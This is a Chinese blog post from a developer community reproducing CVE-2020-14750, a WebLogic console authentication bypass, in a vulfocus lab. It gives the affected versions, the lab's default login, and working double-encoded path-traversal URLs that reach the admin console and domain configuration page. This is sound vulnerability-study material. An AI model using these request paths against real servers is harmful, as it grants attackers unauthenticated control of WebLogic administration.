前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2020-14750 Weblogic认证绕过漏洞

CVE-2020-14750 Weblogic认证绕过漏洞

原创
作者头像
用户8478947
发布2022-12-29 17:05:14
1.1K0
发布2022-12-29 17:05:14
举报
文章被收录于专栏:安全学习安全学习

漏洞简介

事项

描述

漏洞概述

远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console

影响范围

10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4、14.1.1.0

漏洞编号

CVE-2020-14750

漏洞搭建

这里使用vulfocus进行复现。

image-20221217202323785
image-20221217202323785

访问http://192.168.146.167:34029/console/login/LoginForm.jsp,搭建成功。

需要注意的是,需要我们先登录才行,不登陆就无法进行未授权,weblogic/welcome1。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。

image-20221217202354029
image-20221217202354029

漏洞复现

访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal,发现有些浏览器可以绕过登录,比如火狐浏览器或者谷歌浏览器。

image-20221217202548527
image-20221217202548527

但是,使用Edge浏览器的时候,发现绕不了,很奇怪。

image-20221217202630263
image-20221217202630263

于是自己一直进行尝试,找到了有个Edge浏览器也可以绕过的url。访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

image-20221217202716215
image-20221217202716215

然后尝试查找上传文件的地方,找了很久发现没有文件上传的地方。。。正常的流程是在后台有一个锁定并编辑的按钮的,但是我没有。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞搭建
  • 漏洞复现
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档